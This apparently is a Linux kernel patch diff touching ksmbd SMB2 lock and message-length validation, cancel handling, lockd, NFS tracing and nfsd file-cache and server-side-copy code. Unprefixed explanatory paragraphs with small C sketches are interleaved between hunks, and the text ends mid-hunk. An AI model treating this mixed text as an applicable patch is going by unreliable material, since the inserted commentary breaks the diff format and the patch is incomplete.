+@@ -149,15 +149,11 @@ static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+ 		break;
+ 	case SMB2_LOCK:
+ 	{
+-		int lock_count;
++		unsigned short lock_count;
+ 
+-		/*
+-		 * smb2_lock request size is 48 included single
+-		 * smb2_lock_element structure size.
+-		 */
+-		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount) - 1;
++		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
+ 		if (lock_count > 0) {
+-			*off = __SMB2_HEADER_STRUCTURE_SIZE + 48;
++			*off = offsetof(struct smb2_lock_req, locks);
+ 			*len = sizeof(struct smb2_lock_element) * lock_count;
+ 		}
+ 		break;
+@@ -412,20 +408,19 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 			goto validate_credit;
+ 
+ 		/*
+-		 * windows client also pad up to 8 bytes when compounding.
+-		 * If pad is longer than eight bytes, log the server behavior
+-		 * (once), since may indicate a problem but allow it and
+-		 * continue since the frame is parseable.
++		 * SMB2 NEGOTIATE request will be validated when message
++		 * handling proceeds.
+ 		 */
+-		if (clc_len < len) {
+-			ksmbd_debug(SMB,
+-				    "cli req padded more than expected. Length %d not %d for cmd:%d mid:%llu\n",
+-				    len, clc_len, command,
+-				    le64_to_cpu(hdr->MessageId));
++		if (command == SMB2_NEGOTIATE_HE)
++			goto validate_credit;
++
++		/*
++		 * Allow a message padded up to an 8-byte boundary.
++		 */
++		if (clc_len < len && (len - clc_len) < 8)
+ 			goto validate_credit;
+-		}
+ 
+-		ksmbd_debug(SMB,
++		pr_err_ratelimited(
+ 			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
+ 			    len, clc_len, command,
+ 			    le64_to_cpu(hdr->MessageId));
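The smb2misc fix computes the lock-array offset with offsetof() on the request structure instead of a hand-maintained "header + 48" constant, and keeps LockCount in an unsigned short so a large wire value cannot go negative. The same validation shape in a self-contained sketch (the struct layout here is hypothetical, not the real SMB2 one):

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct lock_elem { uint64_t off, len; uint32_t flags, pad; };

struct lock_req {
	uint8_t  hdr[64];		/* fixed header (illustrative size) */
	uint16_t lock_count;		/* little-endian on the wire */
	uint8_t  reserved[6];
	struct lock_elem locks[];	/* variable part starts here */
};

/* Validate that 'count' lock elements actually fit in 'pkt_len'.
 * offsetof() tracks the struct layout automatically, so the check
 * cannot drift if fields are added, and the unsigned count avoids
 * the negative-length trap the replaced code had. */
static bool lock_area_fits(uint16_t count, size_t pkt_len)
{
	size_t need = offsetof(struct lock_req, locks)
		    + (size_t)count * sizeof(struct lock_elem);

	return need <= pkt_len;
}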
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index d681f91947d92..875eecc6b95e7 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -6644,7 +6644,7 @@ int smb2_cancel(struct ksmbd_work *work)
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+ 	struct smb2_hdr *chdr;
+-	struct ksmbd_work *cancel_work = NULL, *iter;
++	struct ksmbd_work *iter;
+ 	struct list_head *command_list;
+ 
+ 	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+@@ -6666,7 +6666,9 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->Id.AsyncId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
++			if (iter->cancel_fn)
++				iter->cancel_fn(iter->cancel_argv);
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+@@ -6685,18 +6687,12 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with mid %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->MessageId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+ 	}
+ 
+-	if (cancel_work) {
+-		cancel_work->state = KSMBD_WORK_CANCELLED;
+-		if (cancel_work->cancel_fn)
+-			cancel_work->cancel_fn(cancel_work->cancel_argv);
+-	}
+-
+ 	/* For SMB2_CANCEL command itself send no response*/
+ 	work->send_no_response = 1;
+ 	return 0;
+@@ -7061,6 +7057,14 @@ skip:
+ 
+ 				ksmbd_vfs_posix_lock_wait(flock);
+ 
++				spin_lock(&work->conn->request_lock);
++				spin_lock(&fp->f_lock);
++				list_del(&work->fp_entry);
++				work->cancel_fn = NULL;
++				kfree(argv);
++				spin_unlock(&fp->f_lock);
++				spin_unlock(&work->conn->request_lock);
++
+ 				if (work->state != KSMBD_WORK_ACTIVE) {
+ 					list_del(&smb_lock->llist);
+ 					spin_lock(&work->conn->llist_lock);
+@@ -7069,9 +7073,6 @@ skip:
+ 					locks_free_lock(flock);
+ 
+ 					if (work->state == KSMBD_WORK_CANCELLED) {
+-						spin_lock(&fp->f_lock);
+-						list_del(&work->fp_entry);
+-						spin_unlock(&fp->f_lock);
+ 						rsp->hdr.Status =
+ 							STATUS_CANCELLED;
+ 						kfree(smb_lock);
+@@ -7093,9 +7094,6 @@ skip:
+ 				list_del(&smb_lock->clist);
+ 				spin_unlock(&work->conn->llist_lock);
+ 
+-				spin_lock(&fp->f_lock);
+-				list_del(&work->fp_entry);
+-				spin_unlock(&fp->f_lock);
+ 				goto retry;
+ 			} else if (!rc) {
+ 				spin_lock(&work->conn->llist_lock);
+diff --git a/fs/ksmbd/vfs_cache.c b/fs/ksmbd/vfs_cache.c
+index da9163b003503..0ae5dd0829e92 100644
+--- a/fs/ksmbd/vfs_cache.c
++++ b/fs/ksmbd/vfs_cache.c
+@@ -364,12 +364,11 @@ static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
+ 
+ static void set_close_state_blocked_works(struct ksmbd_file *fp)
+ {
+-	struct ksmbd_work *cancel_work, *ctmp;
++	struct ksmbd_work *cancel_work;
+ 
+ 	spin_lock(&fp->f_lock);
+-	list_for_each_entry_safe(cancel_work, ctmp, &fp->blocked_works,
++	list_for_each_entry(cancel_work, &fp->blocked_works,
+ 				 fp_entry) {
+-		list_del(&cancel_work->fp_entry);
+ 		cancel_work->state = KSMBD_WORK_CLOSED;
+ 		cancel_work->cancel_fn(cancel_work->cancel_argv);
+ 	}
+diff --git a/fs/lockd/svc.c b/fs/lockd/svc.c
+index 59ef8a1f843f3..914ea1c3537d1 100644
+--- a/fs/lockd/svc.c
++++ b/fs/lockd/svc.c
+@@ -496,7 +496,7 @@ static struct ctl_table nlm_sysctls[] = {
+ 	{
+ 		.procname	= "nsm_use_hostnames",
+ 		.data		= &nsm_use_hostnames,
+-		.maxlen		= sizeof(int),
++		.maxlen		= sizeof(bool),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dobool,
+ 	},
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 40d749f29ed3f..4214286e01450 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -10604,7 +10604,9 @@ static void nfs4_disable_swap(struct inode *inode)
+ 	/* The state manager thread will now exit once it is
+ 	 * woken.
+ 	 */
+-	wake_up_var(&NFS_SERVER(inode)->nfs_client->cl_state);
++	struct nfs_client *clp = NFS_SERVER(inode)->nfs_client;
++
++	nfs4_schedule_state_manager(clp);
+ }
+ 
+ static const struct inode_operations nfs4_dir_inode_operations = {
+diff --git a/fs/nfs/nfs4trace.h b/fs/nfs/nfs4trace.h
+index 214bc56f92d2b..d27919d7241d3 100644
+--- a/fs/nfs/nfs4trace.h
++++ b/fs/nfs/nfs4trace.h
+@@ -292,32 +292,34 @@ TRACE_DEFINE_ENUM(NFS4CLNT_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_LEASE_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_DELEGATION_EXPIRED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RUN_MANAGER);
++TRACE_DEFINE_ENUM(NFS4CLNT_MANAGER_AVAILABLE);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_RUNNING);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_READ);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_RW);
++TRACE_DEFINE_ENUM(NFS4CLNT_DELEGRETURN_DELAYED);
+ 
+ #define show_nfs4_clp_state(state) \
+ 	__print_flags(state, "|", \
+-		{ NFS4CLNT_MANAGER_RUNNING,	"MANAGER_RUNNING" }, \
+-		{ NFS4CLNT_CHECK_LEASE,		"CHECK_LEASE" }, \
+-		{ NFS4CLNT_LEASE_EXPIRED,	"LEASE_EXPIRED" }, \
+-		{ NFS4CLNT_RECLAIM_REBOOT,	"RECLAIM_REBOOT" }, \
+-		{ NFS4CLNT_RECLAIM_NOGRACE,	"RECLAIM_NOGRACE" }, \
+-		{ NFS4CLNT_DELEGRETURN,		"DELEGRETURN" }, \
+-		{ NFS4CLNT_SESSION_RESET,	"SESSION_RESET" }, \
+-		{ NFS4CLNT_LEASE_CONFIRM,	"LEASE_CONFIRM" }, \
+-		{ NFS4CLNT_SERVER_SCOPE_MISMATCH, \
+-						"SERVER_SCOPE_MISMATCH" }, \
+-		{ NFS4CLNT_PURGE_STATE,		"PURGE_STATE" }, \
+-		{ NFS4CLNT_BIND_CONN_TO_SESSION, \
+-						"BIND_CONN_TO_SESSION" }, \
+-		{ NFS4CLNT_MOVED,		"MOVED" }, \
+-		{ NFS4CLNT_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ NFS4CLNT_DELEGATION_EXPIRED,	"DELEGATION_EXPIRED" }, \
+-		{ NFS4CLNT_RUN_MANAGER,		"RUN_MANAGER" }, \
+-		{ NFS4CLNT_RECALL_RUNNING,	"RECALL_RUNNING" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_READ, "RECALL_ANY_LAYOUT_READ" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_RW, "RECALL_ANY_LAYOUT_RW" })
++	{ BIT(NFS4CLNT_MANAGER_RUNNING),	"MANAGER_RUNNING" }, \
++	{ BIT(NFS4CLNT_CHECK_LEASE),		"CHECK_LEASE" }, \
++	{ BIT(NFS4CLNT_LEASE_EXPIRED),	"LEASE_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RECLAIM_REBOOT),	"RECLAIM_REBOOT" }, \
++	{ BIT(NFS4CLNT_RECLAIM_NOGRACE),	"RECLAIM_NOGRACE" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN),		"DELEGRETURN" }, \
++	{ BIT(NFS4CLNT_SESSION_RESET),	"SESSION_RESET" }, \
++	{ BIT(NFS4CLNT_LEASE_CONFIRM),	"LEASE_CONFIRM" }, \
++	{ BIT(NFS4CLNT_SERVER_SCOPE_MISMATCH),	"SERVER_SCOPE_MISMATCH" }, \
++	{ BIT(NFS4CLNT_PURGE_STATE),		"PURGE_STATE" }, \
++	{ BIT(NFS4CLNT_BIND_CONN_TO_SESSION),	"BIND_CONN_TO_SESSION" }, \
++	{ BIT(NFS4CLNT_MOVED),		"MOVED" }, \
++	{ BIT(NFS4CLNT_LEASE_MOVED),		"LEASE_MOVED" }, \
++	{ BIT(NFS4CLNT_DELEGATION_EXPIRED),	"DELEGATION_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RUN_MANAGER),		"RUN_MANAGER" }, \
++	{ BIT(NFS4CLNT_MANAGER_AVAILABLE), "MANAGER_AVAILABLE" }, \
++	{ BIT(NFS4CLNT_RECALL_RUNNING),	"RECALL_RUNNING" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_READ), "RECALL_ANY_LAYOUT_READ" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_RW), "RECALL_ANY_LAYOUT_RW" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN_DELAYED), "DELEGRETURN_DELAYED" })
+ 
+ TRACE_EVENT(nfs4_state_mgr,
+ 		TP_PROTO(
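The nfs4trace fix is that __print_flags() matches bit masks, while the NFS4CLNT_* constants are bit numbers used with set_bit()/test_bit(); without BIT() the table decodes the wrong flags. A tiny demonstration of the distinction (names are illustrative):

#include <stdio.h>

#define BIT(n) (1UL << (n))

enum { CLNT_RUNNING = 0, CLNT_CHECK_LEASE = 1 };	/* bit numbers */

static void show(unsigned long state)
{
	/* Compare against BIT(x), never against the raw enum value:
	 * CLNT_CHECK_LEASE == 1 happens to equal BIT(CLNT_RUNNING),
	 * which would silently decode the wrong flag. */
	if (state & BIT(CLNT_RUNNING))
		printf("MANAGER_RUNNING ");
	if (state & BIT(CLNT_CHECK_LEASE))
		printf("CHECK_LEASE ");
	printf("\n");
}

int main(void)
{
	show(BIT(CLNT_CHECK_LEASE));	/* prints only CHECK_LEASE */
	return 0;
}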
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index c0950edb26b0d..697acf5c3c681 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -331,37 +331,27 @@ nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
+ 	return nf;
+ }
+ 
++/**
++ * nfsd_file_check_write_error - check for writeback errors on a file
++ * @nf: nfsd_file to check for writeback errors
++ *
++ * Check whether an nfsd_file has an unseen error. Reset the write
++ * verifier if so.
++ */
+ static void
+-nfsd_file_fsync(struct nfsd_file *nf)
+-{
+-	struct file *file = nf->nf_file;
+-	int ret;
+-
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return;
+-	ret = vfs_fsync(file, 1);
+-	trace_nfsd_file_fsync(nf, ret);
+-	if (ret)
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+-}
+-
+-static int
+ nfsd_file_check_write_error(struct nfsd_file *nf)
+ {
+ 	struct file *file = nf->nf_file;
+ 
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return 0;
+-	return filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err));
++	if ((file->f_mode & FMODE_WRITE) &&
++	    filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err)))
++		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ }
+ 
+ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+ 	trace_nfsd_file_unhash(nf);
+-
+-	if (nfsd_file_check_write_error(nf))
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ 	rhashtable_remove_fast(&nfsd_file_rhash_tbl, &nf->nf_rhash,
+ 			       nfsd_file_rhash_params);
+ }
+@@ -387,23 +377,12 @@ nfsd_file_free(struct nfsd_file *nf)
+ 	this_cpu_add(nfsd_file_total_age, age);
+ 
+ 	nfsd_file_unhash(nf);
+-
+-	/*
+-	 * We call fsync here in order to catch writeback errors. It's not
+-	 * strictly required by the protocol, but an nfsd_file could get
+-	 * evicted from the cache before a COMMIT comes in. If another
+-	 * task were to open that file in the interim and scrape the error,
+-	 * then the client may never see it. By calling fsync here, we ensure
+-	 * that writeback happens before the entry is freed, and that any
+-	 * errors reported result in the write verifier changing.
+-	 */
+-	nfsd_file_fsync(nf);
+-
+ 	if (nf->nf_mark)
+ 		nfsd_file_mark_put(nf->nf_mark);
+ 	if (nf->nf_file) {
+ 		get_file(nf->nf_file);
+ 		filp_close(nf->nf_file, NULL);
++		nfsd_file_check_write_error(nf);
+ 		fput(nf->nf_file);
+ 	}
+ 
+@@ -1159,6 +1138,7 @@ wait_for_construction:
+ out:
+ 	if (status == nfs_ok) {
+ 		this_cpu_inc(nfsd_file_acquisitions);
++		nfsd_file_check_write_error(nf);
+ 		*pnf = nf;
+ 	} else {
+ 		if (refcount_dec_and_test(&nf->nf_ref))
+diff --git a/fs/nfsd/nfs4layouts.c b/fs/nfsd/nfs4layouts.c
+index 3564d1c6f6104..e8a80052cb1ba 100644
+--- a/fs/nfsd/nfs4layouts.c
++++ b/fs/nfsd/nfs4layouts.c
+@@ -323,11 +323,11 @@ nfsd4_recall_file_layout(struct nfs4_layout_stateid *ls)
+ 	if (ls->ls_recalled)
+ 		goto out_unlock;
+ 
+-	ls->ls_recalled = true;
+-	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	if (list_empty(&ls->ls_layouts))
+ 		goto out_unlock;
+ 
++	ls->ls_recalled = true;
++	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	trace_nfsd_layout_recall(&ls->ls_stid.sc_stateid);
+ 
+ 	refcount_inc(&ls->ls_stid.sc_count);
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index f189ba7995f5a..e02ff76fad82c 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1214,8 +1214,10 @@ out:
+ 	return status;
+ out_put_dst:
+ 	nfsd_file_put(*dst);
++	*dst = NULL;
+ out_put_src:
+ 	nfsd_file_put(*src);
++	*src = NULL;
+ 	goto out;
+ }
+ 
+@@ -1293,15 +1295,15 @@ extern void nfs_sb_deactive(struct super_block *sb);
+  * setup a work entry in the ssc delayed unmount list.
+  */
+ static __be32 nfsd4_ssc_setup_dul(struct nfsd_net *nn, char *ipaddr,
+-		struct nfsd4_ssc_umount_item **retwork, struct vfsmount **ss_mnt)
++				  struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd4_ssc_umount_item *tmp;
+ 	DEFINE_WAIT(wait);
++	__be32 status = 0;
+ 
+-	*ss_mnt = NULL;
+-	*retwork = NULL;
++	*nsui = NULL;
+ 	work = kzalloc(sizeof(*work), GFP_KERNEL);
+ try_again:
+ 	spin_lock(&nn->nfsd_ssc_lock);
+@@ -1325,12 +1327,12 @@ try_again:
+ 			finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 			goto try_again;
+ 		}
+-		*ss_mnt = ni->nsui_vfsmount;
++		*nsui = ni;
+ 		refcount_inc(&ni->nsui_refcnt);
+ 		spin_unlock(&nn->nfsd_ssc_lock);
+ 		kfree(work);
+ 
+-		/* return vfsmount in ss_mnt */
++		/* return vfsmount in (*nsui)->nsui_vfsmount */
+ 		return 0;
+ 	}
+ 	if (work) {
+@@ -1338,31 +1340,32 @@ try_again:
+ 		refcount_set(&work->nsui_refcnt, 2);
+ 		work->nsui_busy = true;
+ 		list_add_tail(&work->nsui_list, &nn->nfsd_ssc_mount_list);
+-		*retwork = work;
+-	}
++		*nsui = work;
++	} else
++		status = nfserr_resource;
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	return 0;
++	return status;
+ }
+ 
+-static void nfsd4_ssc_update_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work, struct vfsmount *ss_mnt)
++static void nfsd4_ssc_update_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui,
++				 struct vfsmount *ss_mnt)
+ {
+-	/* set nsui_vfsmount, clear busy flag and wakeup waiters */
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	work->nsui_vfsmount = ss_mnt;
+-	work->nsui_busy = false;
++	nsui->nsui_vfsmount = ss_mnt;
++	nsui->nsui_busy = false;
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+ }
+ 
+-static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work)
++static void nfsd4_ssc_cancel_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui)
+ {
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	list_del(&work->nsui_list);
++	list_del(&nsui->nsui_list);
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	kfree(work);
++	kfree(nsui);
+ }
+ 
+ /*
+@@ -1370,7 +1373,7 @@ static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+  */
+ static __be32
+ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+-		       struct vfsmount **mount)
++		       struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct file_system_type *type;
+ 	struct vfsmount *ss_mnt;
+@@ -1381,7 +1384,6 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	char *ipaddr, *dev_name, *raw_data;
+ 	int len, raw_len;
+ 	__be32 status = nfserr_inval;
+-	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 
+ 	naddr = &nss->u.nl4_addr;
+@@ -1389,6 +1391,7 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 					 naddr->addr_len,
+ 					 (struct sockaddr *)&tmp_addr,
+ 					 sizeof(tmp_addr));
++	*nsui = NULL;
+ 	if (tmp_addrlen == 0)
+ 		goto out_err;
+ 
+@@ -1431,10 +1434,10 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 		goto out_free_rawdata;
+ 	snprintf(dev_name, len + 5, "%s%s%s:/", startsep, ipaddr, endsep);
+ 
+-	status = nfsd4_ssc_setup_dul(nn, ipaddr, &work, &ss_mnt);
++	status = nfsd4_ssc_setup_dul(nn, ipaddr, nsui);
+ 	if (status)
+ 		goto out_free_devname;
+-	if (ss_mnt)
++	if ((*nsui)->nsui_vfsmount)
+ 		goto out_done;
+ 
+ 	/* Use an 'internal' mount: SB_KERNMOUNT -> MNT_INTERNAL */
+@@ -1442,15 +1445,12 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	module_put(type->owner);
+ 	if (IS_ERR(ss_mnt)) {
+ 		status = nfserr_nodev;
+-		if (work)
+-			nfsd4_ssc_cancel_dul_work(nn, work);
++		nfsd4_ssc_cancel_dul(nn, *nsui);
+ 		goto out_free_devname;
+ 	}
+-	if (work)
+-		nfsd4_ssc_update_dul_work(nn, work, ss_mnt);
++	nfsd4_ssc_update_dul(nn, *nsui, ss_mnt);
+ out_done:
+ 	status = 0;
+-	*mount = ss_mnt;
+ 
+ out_free_devname:
+ 	kfree(dev_name);
+@@ -1474,7 +1474,7 @@ out_err:
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy, struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+ 	struct svc_fh *s_fh = NULL;
+ 	stateid_t *s_stid = &copy->cp_src_stateid;
+@@ -1487,7 +1487,7 @@ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 	if (status)
+ 		goto out;
+ 
+-	status = nfsd4_interssc_connect(copy->cp_src, rqstp, mount);
++	status = nfsd4_interssc_connect(copy->cp_src, rqstp, &copy->ss_nsui);
+ 	if (status)
+ 		goto out;
+ 
+@@ -1505,45 +1505,26 @@ out:
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+-	bool found = false;
+-	long timeout;
+-	struct nfsd4_ssc_umount_item *tmp;
+-	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd_net *nn = net_generic(dst->nf_net, nfsd_net_id);
++	long timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+ 
+ 	nfs42_ssc_close(filp);
+-	nfsd_file_put(dst);
+ 	fput(filp);
+ 
+-	if (!nn) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+-	list_for_each_entry_safe(ni, tmp, &nn->nfsd_ssc_mount_list, nsui_list) {
+-		if (ni->nsui_vfsmount->mnt_sb == ss_mnt->mnt_sb) {
+-			list_del(&ni->nsui_list);
+-			/*
+-			 * vfsmount can be shared by multiple exports,
+-			 * decrement refcnt. If the count drops to 1 it
+-			 * will be unmounted when nsui_expire expires.
+-			 */
+-			refcount_dec(&ni->nsui_refcnt);
+-			ni->nsui_expire = jiffies + timeout;
+-			list_add_tail(&ni->nsui_list, &nn->nfsd_ssc_mount_list);
+-			found = true;
+-			break;
+-		}
+-	}
++	list_del(&nsui->nsui_list);
++	/*
++	 * vfsmount can be shared by multiple exports, so decrement
++	 * the refcnt. If the count drops to 1 it
++	 * will be unmounted when nsui_expire expires.
++	 */
++	refcount_dec(&nsui->nsui_refcnt);
++	nsui->nsui_expire = jiffies + timeout;
++	list_add_tail(&nsui->nsui_list, &nn->nfsd_ssc_mount_list);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	if (!found) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ }
+ 
+ #else /* CONFIG_NFSD_V4_2_INTER_SSC */
+@@ -1551,15 +1532,13 @@ nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy,
+-		      struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+-	*mount = NULL;
+ 	return nfserr_inval;
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+ }
+@@ -1582,13 +1561,6 @@ nfsd4_setup_intra_ssc(struct svc_rqst *rqstp,
+ 				 &copy->nf_dst);
+ }
+ 
+-static void
+-nfsd4_cleanup_intra_ssc(struct nfsd_file *src, struct nfsd_file *dst)
+-{
+-	nfsd_file_put(src);
+-	nfsd_file_put(dst);
+-}
+-
+ static void nfsd4_cb_offload_release(struct nfsd4_callback *cb)
+ {
+ 	struct nfsd4_cb_offload *cbo =
+@@ -1700,18 +1672,27 @@ static void dup_copy_fields(struct nfsd4_copy *src, struct nfsd4_copy *dst)
+ 	memcpy(dst->cp_src, src->cp_src, sizeof(struct nl4_server));
+ 	memcpy(&dst->stateid, &src->stateid, sizeof(src->stateid));
+ 	memcpy(&dst->c_fh, &src->c_fh, sizeof(src->c_fh));
+-	dst->ss_mnt = src->ss_mnt;
++	dst->ss_nsui = src->ss_nsui;
++}
++
++static void release_copy_files(struct nfsd4_copy *copy)
++{
++	if (copy->nf_src)
++		nfsd_file_put(copy->nf_src);
++	if (copy->nf_dst)
++		nfsd_file_put(copy->nf_dst);
+ }
+ 
+ static void cleanup_async_copy(struct nfsd4_copy *copy)
+ {
+ 	nfs4_free_copy_state(copy);
+-	nfsd_file_put(copy->nf_dst);
+-	if (!nfsd4_ssc_is_inter(copy))
+-		nfsd_file_put(copy->nf_src);
+-	spin_lock(&copy->cp_clp->async_lock);
+-	list_del(&copy->copies);
+-	spin_unlock(&copy->cp_clp->async_lock);
++	release_copy_files(copy);
++	if (copy->cp_clp) {
++		spin_lock(&copy->cp_clp->async_lock);
++		if (!list_empty(&copy->copies))
++			list_del_init(&copy->copies);
++		spin_unlock(&copy->cp_clp->async_lock);
++	}
+ 	nfs4_put_copy(copy);
+ }
+ 
+@@ -1749,8 +1730,8 @@ static int nfsd4_do_async_copy(void *data)
+ 	if (nfsd4_ssc_is_inter(copy)) {
+ 		struct file *filp;
+ 
+-		filp = nfs42_ssc_open(copy->ss_mnt, &copy->c_fh,
+-				      &copy->stateid);
++		filp = nfs42_ssc_open(copy->ss_nsui->nsui_vfsmount,
++				      &copy->c_fh, &copy->stateid);
+ 		if (IS_ERR(filp)) {
+ 			switch (PTR_ERR(filp)) {
+ 			case -EBADF:
+@@ -1764,11 +1745,10 @@ static int nfsd4_do_async_copy(void *data)
+ 		}
+ 		nfserr = nfsd4_do_copy(copy, filp, copy->nf_dst->nf_file,
+ 				       false);
+-		nfsd4_cleanup_inter_ssc(copy->ss_mnt, filp, copy->nf_dst);
++		nfsd4_cleanup_inter_ssc(copy->ss_nsui, filp, copy->nf_dst);
+ 	} else {
+ 		nfserr = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, false);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ 
+ do_callback:
+@@ -1790,8 +1770,7 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			status = nfserr_notsupp;
+ 			goto out;
+ 		}
+-		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy,
+-				&copy->ss_mnt);
++		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy);
+ 		if (status)
+ 			return nfserr_offload_denied;
+ 	} else {
+@@ -1810,12 +1789,13 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 		async_copy = kzalloc(sizeof(struct nfsd4_copy), GFP_KERNEL);
+ 		if (!async_copy)
+ 			goto out_err;
++		INIT_LIST_HEAD(&async_copy->copies);
++		refcount_set(&async_copy->refcount, 1);
